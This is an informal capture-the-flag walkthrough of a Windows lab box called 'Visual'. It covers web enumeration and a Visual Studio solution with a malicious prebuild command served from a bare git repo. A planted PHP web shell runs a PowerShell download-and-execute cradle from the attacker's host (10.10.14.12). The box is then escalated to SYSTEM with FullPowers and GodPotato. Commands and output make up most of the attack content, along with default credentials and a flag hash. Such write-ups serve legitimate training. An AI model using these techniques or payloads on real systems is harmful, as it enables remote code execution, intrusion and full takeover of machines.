VISUAL(NO AD)
NMAP:
# Nmap 7.94 scan initiated Sat Sep 30 15:19:00 2023 as: nmap -sCV -p80 -Pn -n -oN allports 10.10.11.234 Nmap scan report for 10.10.11.234 Host is up (0.065s latency). PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.56 ((Win64) OpenSSL/1.1.1t PHP/8.1.17) |_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17 |_http-title: Visual - Revolutionizing Visual Studio Builds Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Sat Sep 30 15:19:12 2023 -- 1 IP address (1 host up) scanned in 12.10 seconds
# Nmap 7.94 scan initiated Sat Sep 30 15:19:00 2023 as: nmap -sCV -p80 -Pn -n -oN allports 10.10.11.234
Nmap scan report for 10.10.11.234
Host is up (0.065s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.56 ((Win64) OpenSSL/1.1.1t PHP/8.1.17)
|_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17
|_http-title: Visual - Revolutionizing Visual Studio Builds
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Sep 30 15:19:12 2023 -- 1 IP address (1 host up) scanned in 12.10 seconds
Feroxbuster Main Page output
kali@kali ~/machines/visual/nmap $ feroxbuster -u http://10.10.11.234 -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-small-words.txt ___ ___ __ __ __ __ __ ___ |__ |__ |__) |__) | / ` / \ \_/ | | \ |__ | |___ | \ | \ | \__, \__/ / \ | |__/ |___ by Ben "epi" Risher 🤓 ver: 2.10.0 ───────────────────────────┬────────────────────── 🎯 Target Url │ http://10.10.11.234 🚀 Threads │ 50 📖 Wordlist │ /usr/share/wordlists/seclists/Discovery/Web-Content/raft-small-words.txt 👌 Status Codes │ All Status Codes! 💥 Timeout (secs) │ 7 🦡 User-Agent │ feroxbuster/2.10.0 💉 Config File │ /etc/feroxbuster/ferox-config.toml 🔎 Extract Links │ true 🏁 HTTP methods │ [GET] 🔃 Recursion Depth │ 4 ───────────────────────────┴────────────────────── 🏁 Press [ENTER] to use the Scan Management Menu™ ────────────────────────────────────────────────── 404 GET 9l 33w 299c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter 403 GET 9l 30w 302c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter 301 GET 9l 30w 335c http://10.10.11.234/css => http://10.10.11.234/css/ 301 GET 9l 30w 334c http://10.10.11.234/js => http://10.10.11.234/js/ 200 GET 0l 0w 0c http://10.10.11.234/submit.php 200 GET 7l 36w 336c http://10.10.11.234/js/scripts.js 200 GET 8l 29w 28898c http://10.10.11.234/assets/favicon.ico 301 GET 9l 30w 339c http://10.10.11.234/uploads => http://10.10.11.234/uploads/ 301 GET 9l 30w 338c http://10.10.11.234/assets => http://10.10.11.234/assets/ 403 GET 11l 47w 421c http://10.10.11.234/webalizer 200 GET 117l 555w 7534c http://10.10.11.234/ 403 GET 11l 47w 421c http://10.10.11.234/phpmyadmin 200 GET 11559l 23754w 250218c http://10.10.11.234/css/styles.css 301 GET 9l 30w 335c http://10.10.11.234/CSS => http://10.10.11.234/CSS/ 200 GET 11559l 23754w 250218c http://10.10.11.234/CSS/styles.css 503 GET 11l 44w 402c http://10.10.11.234/examples 301 GET 9l 30w 334c http://10.10.11.234/JS => http://10.10.11.234/JS/ 301 GET 9l 30w 338c http://10.10.11.234/Assets => http://10.10.11.234/Assets/ 200 GET 7l 36w 336c http://10.10.11.234/JS/scripts.js 200 GET 8l 29w 28898c http://10.10.11.234/Assets/favicon.ico 301 GET 9l 30w 339c http://10.10.11.234/Uploads => http://10.10.11.234/Uploads/ 301 GET 9l 30w 335c http://10.10.11.234/Css => http://10.10.11.234/Css/ 301 GET 9l 30w 334c http://10.10.11.234/Js => http://10.10.11.234/Js/ 200 GET 7l 36w 336c http://10.10.11.234/Js/scripts.js 200 GET 11559l 23754w 250218c http://10.10.11.234/Css/styles.css 403 GET 11l 47w 421c http://10.10.11.234/licenses 403 GET 11l 47w 421c http://10.10.11.234/server-status 301 GET 9l 30w 339c http://10.10.11.234/UPLOADS => http://10.10.11.234/UPLOADS/ 301 GET 9l 30w 338c http://10.10.11.234/ASSETS => http://10.10.11.234/ASSETS/ 200 GET 8l 29w 28898c http://10.10.11.234/ASSETS/favicon.ico 403 GET 11l 47w 421c http://10.10.11.234/server-info [####################] - 3m 172065/172065 0s found:29 errors:625 [####################] - 2m 43008/43008 310/s http://10.10.11.234/ [####################] - 1s 43008/43008 41394/s http://10.10.11.234/css/ => Directory listing [####################] - 0s 43008/43008 367590/s http://10.10.11.234/js/ => Directory listing [####################] - 0s 43008/43008 537600/s http://10.10.11.234/assets/ => Directory listing [####################] - 2m 43008/43008 312/s http://10.10.11.234/uploads/ [####################] - 1s 43008/43008 42041/s http://10.10.11.234/CSS/ => Directory listing [####################] - 0s 43008/43008 217212/s http://10.10.11.234/JS/ => Directory listing [####################] - 0s 43008/43008 183013/s http://10.10.11.234/Assets/ => Directory listing [####################] - 3m 43008/43008 254/s http://10.10.11.234/Uploads/ [####################] - 1s 43008/43008 37926/s http://10.10.11.234/Css/ => Directory listing [####################] - 0s 43008/43008 203829/s http://10.10.11.234/Js/ => Directory listing [####################] - 3m 43008/43008 280/s http://10.10.11.234/UPLOADS/
kali@kali ~/machines/visual/nmap $ feroxbuster -u http://10.10.11.234 -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-small-words.txt
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.10.0
───────────────────────────┬──────────────────────
🎯 Target Url │ http://10.10.11.234
🚀 Threads │ 50
📖 Wordlist │ /usr/share/wordlists/seclists/Discovery/Web-Content/raft-small-words.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.10.0
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404 GET 9l 33w 299c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
403 GET 9l 30w 302c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
301 GET 9l 30w 335c http://10.10.11.234/css => http://10.10.11.234/css/
301 GET 9l 30w 334c http://10.10.11.234/js => http://10.10.11.234/js/
200 GET 0l 0w 0c http://10.10.11.234/submit.php
200 GET 7l 36w 336c http://10.10.11.234/js/scripts.js
200 GET 8l 29w 28898c http://10.10.11.234/assets/favicon.ico
301 GET 9l 30w 339c http://10.10.11.234/uploads => http://10.10.11.234/uploads/
301 GET 9l 30w 338c http://10.10.11.234/assets => http://10.10.11.234/assets/
403 GET 11l 47w 421c http://10.10.11.234/webalizer
200 GET 117l 555w 7534c http://10.10.11.234/
403 GET 11l 47w 421c http://10.10.11.234/phpmyadmin
200 GET 11559l 23754w 250218c http://10.10.11.234/css/styles.css
301 GET 9l 30w 335c http://10.10.11.234/CSS => http://10.10.11.234/CSS/
200 GET 11559l 23754w 250218c http://10.10.11.234/CSS/styles.css
503 GET 11l 44w 402c http://10.10.11.234/examples
301 GET 9l 30w 334c http://10.10.11.234/JS => http://10.10.11.234/JS/
301 GET 9l 30w 338c http://10.10.11.234/Assets => http://10.10.11.234/Assets/
200 GET 7l 36w 336c http://10.10.11.234/JS/scripts.js
200 GET 8l 29w 28898c http://10.10.11.234/Assets/favicon.ico
301 GET 9l 30w 339c http://10.10.11.234/Uploads => http://10.10.11.234/Uploads/
301 GET 9l 30w 335c http://10.10.11.234/Css => http://10.10.11.234/Css/
301 GET 9l 30w 334c http://10.10.11.234/Js => http://10.10.11.234/Js/
200 GET 7l 36w 336c http://10.10.11.234/Js/scripts.js
200 GET 11559l 23754w 250218c http://10.10.11.234/Css/styles.css
403 GET 11l 47w 421c http://10.10.11.234/licenses
403 GET 11l 47w 421c http://10.10.11.234/server-status
301 GET 9l 30w 339c http://10.10.11.234/UPLOADS => http://10.10.11.234/UPLOADS/
301 GET 9l 30w 338c http://10.10.11.234/ASSETS => http://10.10.11.234/ASSETS/
200 GET 8l 29w 28898c http://10.10.11.234/ASSETS/favicon.ico
403 GET 11l 47w 421c http://10.10.11.234/server-info
[####################] - 3m 172065/172065 0s found:29 errors:625
[####################] - 2m 43008/43008 310/s http://10.10.11.234/
[####################] - 1s 43008/43008 41394/s http://10.10.11.234/css/ => Directory listing
[####################] - 0s 43008/43008 367590/s http://10.10.11.234/js/ => Directory listing
[####################] - 0s 43008/43008 537600/s http://10.10.11.234/assets/ => Directory listing
[####################] - 2m 43008/43008 312/s http://10.10.11.234/uploads/
[####################] - 1s 43008/43008 42041/s http://10.10.11.234/CSS/ => Directory listing
[####################] - 0s 43008/43008 217212/s http://10.10.11.234/JS/ => Directory listing
[####################] - 0s 43008/43008 183013/s http://10.10.11.234/Assets/ => Directory listing
[####################] - 3m 43008/43008 254/s http://10.10.11.234/Uploads/
[####################] - 1s 43008/43008 37926/s http://10.10.11.234/Css/ => Directory listing
[####################] - 0s 43008/43008 203829/s http://10.10.11.234/Js/ => Directory listing
[####################] - 3m 43008/43008 280/s http://10.10.11.234/UPLOADS/this is a PHP server
it was a page that asked for a git repo to compile .sln file
there was a input to put the http address to download the repo
it put mine, and got a reponse
kali@kali ~/machines/visual/nmap $ nc -nlvp 80 listening on [any] 80 ... connect to [10.10.14.12] from (UNKNOWN) [10.10.11.234] 49675 GET /info/refs?service=git-upload-pack HTTP/1.1 Host: 10.10.14.12 User-Agent: git/2.41.0.windows.1 Accept: */* Accept-Encoding: deflate, gzip, br, zstd Pragma: no-cache Git-Protocol: version=2
kali@kali ~/machines/visual/nmap $ nc -nlvp 80
listening on [any] 80 ...
connect to [10.10.14.12] from (UNKNOWN) [10.10.11.234] 49675
GET /info/refs?service=git-upload-pack HTTP/1.1
Host: 10.10.14.12
User-Agent: git/2.41.0.windows.1
Accept: */*
Accept-Encoding: deflate, gzip, br, zstd
Pragma: no-cache
Git-Protocol: version=2the part to get the rev shell was thuft, because i needed to create a .net progrma with c code, and that program needed to contain a command in the prebuild option - so it would be executed when load the .sln solution; as it were not enoguht, it was extremely hard to host a git repo on http, because it always refused the connection and give a 404, so it was hard to find a way to host it
strategy.
i found a way to host a git repo, but i needed to clone a real repo, and with that repo do a git --bare clone of the repo path, and the do some configuration steps to be able to make that point to my http server
there was a useful resource
this was the steps:
1.clone the repo
kali@kali ~/machines/visual/content/windows/kami $ git clone https://github.com/kamisw03/test2.git Cloning into 'test2'... remote: Enumerating objects: 19, done. remote: Counting objects: 100% (19/19), done. remote: Compressing objects: 100% (18/18), done. remote: Total 19 (delta 1), reused 0 (delta 0), pack-reused 0 Receiving objects: 100% (19/19), 4.65 KiB | 4.65 MiB/s, done. Resolving deltas: 100% (1/1), done.
kali@kali ~/machines/visual/content/windows/kami $ git clone https://github.com/kamisw03/test2.git
Cloning into 'test2'...
remote: Enumerating objects: 19, done.
remote: Counting objects: 100% (19/19), done.
remote: Compressing objects: 100% (18/18), done.
remote: Total 19 (delta 1), reused 0 (delta 0), pack-reused 0
Receiving objects: 100% (19/19), 4.65 KiB | 4.65 MiB/s, done.
Resolving deltas: 100% (1/1), done.2.bare clone of the repo, but locally
kali@kali ~/machines/visual/content/windows/kami $ git --bare clone /home/kali/machines/visual/content/windows/kami/test2 revshell Cloning into 'revshell'... done.
kali@kali ~/machines/visual/content/windows/kami $ git --bare clone /home/kali/machines/visual/content/windows/kami/test2 revshell
Cloning into 'revshell'...
done.3.configure the repo to point to the real one, and be able to host the http server
kali@kali ~/machines/visual/content/windows/kami/revshell/.git (main) $ git --bare update-server-info kali@kali ~/machines/visual/content/windows/kami/revshell/.git (main) $ mv hooks/post-update.sample hooks/post-update
kali@kali ~/machines/visual/content/windows/kami/revshell/.git (main) $ git --bare update-server-info
kali@kali ~/machines/visual/content/windows/kami/revshell/.git (main) $ mv hooks/post-update.sample hooks/post-updateknow i can host it
kali@kali ~/machines/visual/content/windows/kami/revshell/.git (main) $ python3 -m http.server 8000 Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ... 127.0.0.1 - - [01/Oct/2023 16:27:08] "GET /info/refs?service=git-upload-pack HTTP/1.1" 200 - 127.0.0.1 - - [01/Oct/2023 16:27:08] "GET /HEAD HTTP/1.1" 200 - 127.0.0.1 - - [01/Oct/2023 16:27:08] code 404, message File not found 127.0.0.1 - - [01/Oct/2023 16:27:08] "GET /objects/ca/0a9b6f1005fdcfb4e2e1e8166bbece885cd37a HTTP/1.1" 404 - 127.0.0.1 - - [01/Oct/2023 16:27:08] code 404, message File not found 127.0.0.1 - - [01/Oct/2023 16:27:08] "GET /objects/info/http-alternates HTTP/1.1" 404 - 127.0.0.1 - - [01/Oct/2023 16:27:08] code 404, message File not found 127.0.0.1 - - [01/Oct/2023 16:27:08] "GET /objects/info/alternates HTTP/1.1" 404 - 127.0.0.1 - - [01/Oct/2023 16:27:08] "GET /objects/info/packs HTTP/1.1" 200 - 127.0.0.1 - - [01/Oct/2023 16:27:08] "GET /objects/pack/pack-960ab2cf587f6a6a3244e10d42e7029d83f89e05.idx HTTP/1.1" 200 - 127.0.0.1 - - [01/Oct/2023 16:27:08] "GET /objects/pack/pack-960ab2cf587f6a6a3244e10d42e7029d83f89e05.pack HTTP/1.1" 200 -
kali@kali ~/machines/visual/content/windows/kami/revshell/.git (main) $ python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
127.0.0.1 - - [01/Oct/2023 16:27:08] "GET /info/refs?service=git-upload-pack HTTP/1.1" 200 -
127.0.0.1 - - [01/Oct/2023 16:27:08] "GET /HEAD HTTP/1.1" 200 -
127.0.0.1 - - [01/Oct/2023 16:27:08] code 404, message File not found
127.0.0.1 - - [01/Oct/2023 16:27:08] "GET /objects/ca/0a9b6f1005fdcfb4e2e1e8166bbece885cd37a HTTP/1.1" 404 -
127.0.0.1 - - [01/Oct/2023 16:27:08] code 404, message File not found
127.0.0.1 - - [01/Oct/2023 16:27:08] "GET /objects/info/http-alternates HTTP/1.1" 404 -
127.0.0.1 - - [01/Oct/2023 16:27:08] code 404, message File not found
127.0.0.1 - - [01/Oct/2023 16:27:08] "GET /objects/info/alternates HTTP/1.1" 404 -
127.0.0.1 - - [01/Oct/2023 16:27:08] "GET /objects/info/packs HTTP/1.1" 200 -
127.0.0.1 - - [01/Oct/2023 16:27:08] "GET /objects/pack/pack-960ab2cf587f6a6a3244e10d42e7029d83f89e05.idx HTTP/1.1" 200 -
127.0.0.1 - - [01/Oct/2023 16:27:08] "GET /objects/pack/pack-960ab2cf587f6a6a3244e10d42e7029d83f89e05.pack HTTP/1.1" 200 -creating the malicious .sln
create a normal project on visual studio
i had to use .net6, because that was the version that the windows target machine supports
then inject the command in the prebuild options
it was over the solution, properties, adn build features
and then inject any command there
know when somebody tries to compile the solution, he will execute that command at the beggining
so then i uploaded all the files to my github, and followed all the stpes to clone the repo, recone it with the bare options,and then host it
kali@kali ~/machines/visual/content/windows/kami/revshell/.git (main) $ python3 -m http.server 8000 Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ... 10.10.11.234 - - [01/Oct/2023 16:27:59] "GET /info/refs?service=git-upload-pack HTTP/1.1" 200 - 10.10.11.234 - - [01/Oct/2023 16:27:59] "GET /HEAD HTTP/1.1" 200 - 10.10.11.234 - - [01/Oct/2023 16:27:59] code 404, message File not found 10.10.11.234 - - [01/Oct/2023 16:27:59] "GET /objects/ca/0a9b6f1005fdcfb4e2e1e8166bbece885cd37a HTTP/1.1" 404 - 10.10.11.234 - - [01/Oct/2023 16:27:59] code 404, message File not found 10.10.11.234 - - [01/Oct/2023 16:27:59] "GET /objects/info/http-alternates HTTP/1.1" 404 - 10.10.11.234 - - [01/Oct/2023 16:27:59] code 404, message File not found 10.10.11.234 - - [01/Oct/2023 16:27:59] "GET /objects/info/alternates HTTP/1.1" 404 - 10.10.11.234 - - [01/Oct/2023 16:28:00] "GET /objects/info/packs HTTP/1.1" 200 - 10.10.11.234 - - [01/Oct/2023 16:28:00] "GET /objects/pack/pack-960ab2cf587f6a6a3244e10d42e7029d83f89e05.idx HTTP/1.1" 200 - 10.10.11.234 - - [01/Oct/2023 16:28:00] "GET /objects/pack/pack-960ab2cf587f6a6a3244e10d42e7029d83f89e05.pack HTTP/1.1" 200 -
kali@kali ~/machines/visual/content/windows/kami/revshell/.git (main) $ python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.11.234 - - [01/Oct/2023 16:27:59] "GET /info/refs?service=git-upload-pack HTTP/1.1" 200 -
10.10.11.234 - - [01/Oct/2023 16:27:59] "GET /HEAD HTTP/1.1" 200 -
10.10.11.234 - - [01/Oct/2023 16:27:59] code 404, message File not found
10.10.11.234 - - [01/Oct/2023 16:27:59] "GET /objects/ca/0a9b6f1005fdcfb4e2e1e8166bbece885cd37a HTTP/1.1" 404 -
10.10.11.234 - - [01/Oct/2023 16:27:59] code 404, message File not found
10.10.11.234 - - [01/Oct/2023 16:27:59] "GET /objects/info/http-alternates HTTP/1.1" 404 -
10.10.11.234 - - [01/Oct/2023 16:27:59] code 404, message File not found
10.10.11.234 - - [01/Oct/2023 16:27:59] "GET /objects/info/alternates HTTP/1.1" 404 -
10.10.11.234 - - [01/Oct/2023 16:28:00] "GET /objects/info/packs HTTP/1.1" 200 -
10.10.11.234 - - [01/Oct/2023 16:28:00] "GET /objects/pack/pack-960ab2cf587f6a6a3244e10d42e7029d83f89e05.idx HTTP/1.1" 200 -
10.10.11.234 - - [01/Oct/2023 16:28:00] "GET /objects/pack/pack-960ab2cf587f6a6a3244e10d42e7029d83f89e05.pack HTTP/1.1" 200 -got the shell
kali@kali ~/machines/visual/exploit $ python3 -m http.server 80 Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ... 10.10.11.234 - - [01/Oct/2023 16:28:32] "GET /ps.ps1 HTTP/1.1" 200 -
kali@kali ~/machines/visual/exploit $ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.11.234 - - [01/Oct/2023 16:28:32] "GET /ps.ps1 HTTP/1.1" 200 -PS C:\Windows\Temp\b36ef5007abe97de121176e44bd587\ConsoleApp2> whoami visual\enox PS C:\Windows\Temp\b36ef5007abe97de121176e44bd587\ConsoleApp2>
PS C:\Windows\Temp\b36ef5007abe97de121176e44bd587\ConsoleApp2> whoami
visual\enox
PS C:\Windows\Temp\b36ef5007abe97de121176e44bd587\ConsoleApp2>
grab the flag
PS C:\Users\enox> cd .\Desktop\
PS C:\Users\enox\Desktop> dir
Directory: C:\Users\enox\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 9/28/2023 11:34 AM 34 user.txt
PS C:\Users\enox\Desktop> cat .\user.txt
4aaac8e1826c92755c629f810570bf2f
PS C:\Users\enox\Desktop>PS C:\Users\enox> cd .\Desktop\
PS C:\Users\enox\Desktop> dir
Directory: C:\Users\enox\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 9/28/2023 11:34 AM 34 user.txt
PS C:\Users\enox\Desktop> cat .\user.txt
4aaac8e1826c92755c629f810570bf2f
PS C:\Users\enox\Desktop>system info
PS C:\Users\enox\Documents> systeminfo
Host Name: VISUAL
OS Name: Microsoft Windows Server 2019 Standard
OS Version: 10.0.17763 N/A Build 17763
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00429-00521-62775-AA642
Original Install Date: 6/10/2023, 10:08:12 AM
System Boot Time: 9/30/2023, 12:00:26 PM
System Manufacturer: VMware, Inc.
System Model: VMware7,1
System Type: x64-based PC
Processor(s): 2 Processor(s) Installed.
[01]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2295 Mhz
[02]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2295 Mhz
BIOS Version: VMware, Inc. VMW71.00V.16707776.B64.2008070230, 8/7/2020
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume2
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC-08:00) Pacific Time (US & Canada)
Total Physical Memory: 4,095 MB
Available Physical Memory: 2,978 MB
Virtual Memory: Available: 3,509 MB
Virtual Memory: In Use: 1,290 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: vmxnet3 Ethernet Adapter
Connection Name: Ethernet0 2
DHCP Enabled: No
IP address(es)
[01]: 10.10.11.234
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.PS C:\Users\enox\Documents> systeminfo
Host Name: VISUAL
OS Name: Microsoft Windows Server 2019 Standard
OS Version: 10.0.17763 N/A Build 17763
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00429-00521-62775-AA642
Original Install Date: 6/10/2023, 10:08:12 AM
System Boot Time: 9/30/2023, 12:00:26 PM
System Manufacturer: VMware, Inc.
System Model: VMware7,1
System Type: x64-based PC
Processor(s): 2 Processor(s) Installed.
[01]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2295 Mhz
[02]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2295 Mhz
BIOS Version: VMware, Inc. VMW71.00V.16707776.B64.2008070230, 8/7/2020
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume2
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC-08:00) Pacific Time (US & Canada)
Total Physical Memory: 4,095 MB
Available Physical Memory: 2,978 MB
Virtual Memory: Available: 3,509 MB
Virtual Memory: In Use: 1,290 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: vmxnet3 Ethernet Adapter
Connection Name: Ethernet0 2
DHCP Enabled: No
IP address(es)
[01]: 10.10.11.234
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.run winpeas.
found some passwords on the directory xampp and some notes
PS C:\xampp> cat .\passwords.txt ### XAMPP Default Passwords ### 1) MySQL (phpMyAdmin): User: root Password: (means no password!) 2) FileZilla FTP: [ You have to create a new user on the FileZilla Interface ] 3) Mercury (not in the USB & lite version): Postmaster: Postmaster (postmaster@localhost) Administrator: Admin (admin@localhost) User: newuser Password: wampp 4) WEBDAV: User: xampp-dav-unsecure Password: ppmax2011 Attention: WEBDAV is not active since XAMPP Version 1.7.4. For activation please comment out the httpd-dav.conf and following modules in the httpd.conf LoadModule dav_module modules/mod_dav.so LoadModule dav_fs_module modules/mod_dav_fs.so Please do not forget to refresh the WEBDAV authentification (users and passwords).
PS C:\xampp> cat .\passwords.txt
### XAMPP Default Passwords ###
1) MySQL (phpMyAdmin):
User: root
Password:
(means no password!)
2) FileZilla FTP:
[ You have to create a new user on the FileZilla Interface ]
3) Mercury (not in the USB & lite version):
Postmaster: Postmaster (postmaster@localhost)
Administrator: Admin (admin@localhost)
User: newuser
Password: wampp
4) WEBDAV:
User: xampp-dav-unsecure
Password: ppmax2011
Attention: WEBDAV is not active since XAMPP Version 1.7.4.
For activation please comment out the httpd-dav.conf and
following modules in the httpd.conf
LoadModule dav_module modules/mod_dav.so
LoadModule dav_fs_module modules/mod_dav_fs.so
Please do not forget to refresh the WEBDAV authentification (users and passwords).goind back, with this user, i could put files on the web directoryC:\xampp\htdocs
so what i did, was just to put a PHP rev shell, and call it from the box, because there was a big probability that the user that was running the web server was different as the local user
so i put the php rev shell
<?php system("powershell iex(new-object net.webclient).downloadstring('http://10.10.14.12/ps.ps1')"); ?><?php system("powershell iex(new-object net.webclient).downloadstring('http://10.10.14.12/ps.ps1')"); ?>PS C:\xampp\htdocs> dir
Directory: C:\xampp\htdocs
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 6/10/2023 10:32 AM assets
d----- 6/10/2023 10:32 AM css
d----- 6/10/2023 10:32 AM js
d----- 10/1/2023 1:40 PM uploads
-a---- 6/10/2023 6:20 PM 7534 index.php
-a---- 10/1/2023 2:49 PM 105 rev.php
-a---- 6/10/2023 4:17 PM 1554 submit.php
-a---- 6/10/2023 4:11 PM 4970 vs_status.phpPS C:\xampp\htdocs> dir
Directory: C:\xampp\htdocs
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 6/10/2023 10:32 AM assets
d----- 6/10/2023 10:32 AM css
d----- 6/10/2023 10:32 AM js
d----- 10/1/2023 1:40 PM uploads
-a---- 6/10/2023 6:20 PM 7534 index.php
-a---- 10/1/2023 2:49 PM 105 rev.php
-a---- 6/10/2023 4:17 PM 1554 submit.php
-a---- 6/10/2023 4:11 PM 4970 vs_status.phpthen i just browse the file, and got the shell
PS C:\xampp\htdocs> whoami nt authority\local service PS C:\xampp\htdocs> whoami /priv PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ============================= ============================== ======== SeChangeNotifyPrivilege Bypass traverse checking Enabled SeCreateGlobalPrivilege Create global objects Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
PS C:\xampp\htdocs> whoami
nt authority\local service
PS C:\xampp\htdocs> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== ========
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabledbut even if i did not had many priviledges, i tryied to run the C:\TOOLS\FullPowers.exe to see if it can give me all the priviledges as the github repo says; so i ran it, and yes, i got all the priviledges
C:\Windows\system32>whoami /priv PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ============================= ========================================= ======= SeAssignPrimaryTokenPrivilege Replace a process level token Enabled SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled SeAuditPrivilege Generate security audits Enabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeImpersonatePrivilege Impersonate a client after authentication Enabled SeCreateGlobalPrivilege Create global objects Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
C:\Windows\system32>whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= =======
SeAssignPrimaryTokenPrivilege Replace a process level token Enabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled
SeAuditPrivilege Generate security audits Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabledfinally, in this part, i got stucked for a bit; because i tryied like 5 versions of potatoes; since i already had all the priviledges they should work; but nope; any of them really worked. so somebody told me that few months ago there was another release of potatoe even for windows server 2022 called GodPotatoe, so i gave it a try
, i downlaod the release, transfer it, and it was so simple, i just create a msfvenom rev shell, put it on the machine, and execute it with god potatoe
POC
Exploit
C:\ProgramData>godp.exe -cmd "C:\TOOLS\mal.exe" [*] CombaseModule: 0x140732319531008 [*] DispatchTable: 0x140732321837168 [*] UseProtseqFunction: 0x140732321213344 [*] UseProtseqFunctionParamCount: 6 [*] HookRPC [*] Start PipeServer [*] Trigger RPCSS [*] CreateNamedPipe \\.\pipe\d7e99a8a-dd2f-4e7e-a503-1919d86610e6\pipe\epmapper [*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046 [*] DCOM obj IPID: 00008c02-1bcc-ffff-b20a-b8b3c4afe75a [*] DCOM obj OXID: 0xf878aac315560c2a [*] DCOM obj OID: 0x141b6a0f51adc557 [*] DCOM obj Flags: 0x281 [*] DCOM obj PublicRefs: 0x0 [*] Marshal Object bytes len: 100 [*] UnMarshal Object [*] Pipe Connected! [*] CurrentUser: NT AUTHORITY\NETWORK SERVICE [*] CurrentsImpersonationLevel: Impersonation [*] Start Search System Token [*] PID : 880 Token:0x808 User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation [*] Find System Token : True [*] UnmarshalObject: 0x80070776 [*] CurrentUser: NT AUTHORITY\SYSTEM [*] process start with pid 5228
C:\ProgramData>godp.exe -cmd "C:\TOOLS\mal.exe"
[*] CombaseModule: 0x140732319531008
[*] DispatchTable: 0x140732321837168
[*] UseProtseqFunction: 0x140732321213344
[*] UseProtseqFunctionParamCount: 6
[*] HookRPC
[*] Start PipeServer
[*] Trigger RPCSS
[*] CreateNamedPipe \\.\pipe\d7e99a8a-dd2f-4e7e-a503-1919d86610e6\pipe\epmapper
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 00008c02-1bcc-ffff-b20a-b8b3c4afe75a
[*] DCOM obj OXID: 0xf878aac315560c2a
[*] DCOM obj OID: 0x141b6a0f51adc557
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Impersonation
[*] Start Search System Token
[*] PID : 880 Token:0x808 User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation
[*] Find System Token : True
